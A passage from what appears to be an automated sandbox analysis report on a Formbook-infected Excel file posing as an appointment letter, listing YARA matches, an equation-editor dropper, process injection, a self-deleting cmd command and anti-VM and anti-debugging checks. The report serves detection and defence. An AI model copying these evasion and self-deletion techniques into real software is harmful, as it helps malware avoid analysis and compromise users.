Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F94680		7_2_01F94680
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FA69FE		7_2_01FA69FE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F929B2		7_2_01F929B2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02043A83		7_2_02043A83
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FB286D		7_2_01FB286D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F9C85C		7_2_01F9C85C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0203CBA4		7_2_0203CBA4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0201DBDA		7_2_0201DBDA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F8FBD7		7_2_01F8FBD7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0202F8EE		7_2_0202F8EE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FB7B00		7_2_01FB7B00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_02015955		7_2_02015955
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0203098E		7_2_0203098E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F9CD5B		7_2_01F9CD5B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FC0D3B		7_2_01FC0D3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FBDF7C		7_2_01FBDF7C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FA0F3F		7_2_01FA0F3F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FAEE4C		7_2_01FAEE4C
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01FC2E2F		7_2_01FC2E2F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0202FDDD		7_2_0202FDDD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009A302		7_2_0009A302
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00088C6B		7_2_00088C6B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00088C70		7_2_00088C70
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00082D87		7_2_00082D87
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00082D90		7_2_00082D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_00082FB0		7_2_00082FB0

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01FD373B appears 238 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F8DF5C appears 107 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01FD3F92 appears 108 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01FFF970 appears 81 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 01F8E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007F3F92 appears 108 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00419F80 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007ADF5C appears 118 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007F373B appears 238 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0081F970 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0041A0B0 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 007AE2A8 appears 38 times

Yara signature match

Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/21@5/4

Contains functionality to check free disk space

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

4_2_00404356

Contains functionality to instantiate COM classes

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,

4_2_00402020

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRCFFB.tmp

Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx	Virustotal: Detection: 25%
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx	ReversingLabs: Detection: 21%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

Static file information: File size 1331416 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: RAServer.pdb^ source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp

Document has a 'vbamacros' value indicative of goodware

Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 5.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405E88

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_73002F60 push eax; ret		4_2_73002F8E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041624A pushad ; ret		5_2_0041625B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3C5 push eax; ret		5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B47C push eax; ret		5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B412 push eax; ret		5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B41B push eax; ret		5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040B7D2 push ebx; retf		5_2_0040B7D5
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007ADFA1 push ecx; ret		5_2_007ADFB4
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041624A pushad ; ret		5_1_0041625B
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B3C5 push eax; ret		5_1_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B47C push eax; ret		5_1_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B412 push eax; ret		5_1_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_1_0041B41B push eax; ret		5_1_0041B482
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F8DFA1 push ecx; ret		7_2_01F8DFB4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009624A pushad ; ret		7_2_0009625B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009B3C5 push eax; ret		7_2_0009B418
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009B41B push eax; ret		7_2_0009B482
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009B412 push eax; ret		7_2_0009B418
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0009B47C push eax; ret		7_2_0009B482
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_0008B7D2 push ebx; retf		7_2_0008B7D5

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx

Stream path 'EncryptedPackage' entropy: 7.99982695424 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032	Thread sleep time: -240000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 2248	Thread sleep time: -32000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed

Contains functionality to enumerate / list files inside a directory

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E61 FindFirstFileA,FindClose,		4_2_00405E61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_0040548B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040263E FindFirstFileA,		4_2_0040263E

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: explorer.exe, 00000006.00000000.2168055639.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2154423611.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2141137463.0000000000544000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.2145052068.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B30 LdrLoadDll,

5_2_00409B30

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405E88

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 5_2_007900EA mov eax, dword ptr fs:[00000030h]		5_2_007900EA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00790080 mov ecx, dword ptr fs:[00000030h]		5_2_00790080
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007B26F8 mov eax, dword ptr fs:[00000030h]		5_2_007B26F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 7_2_01F926F8 mov eax, dword ptr fs:[00000030h]		7_2_01F926F8

Enables debug privileges

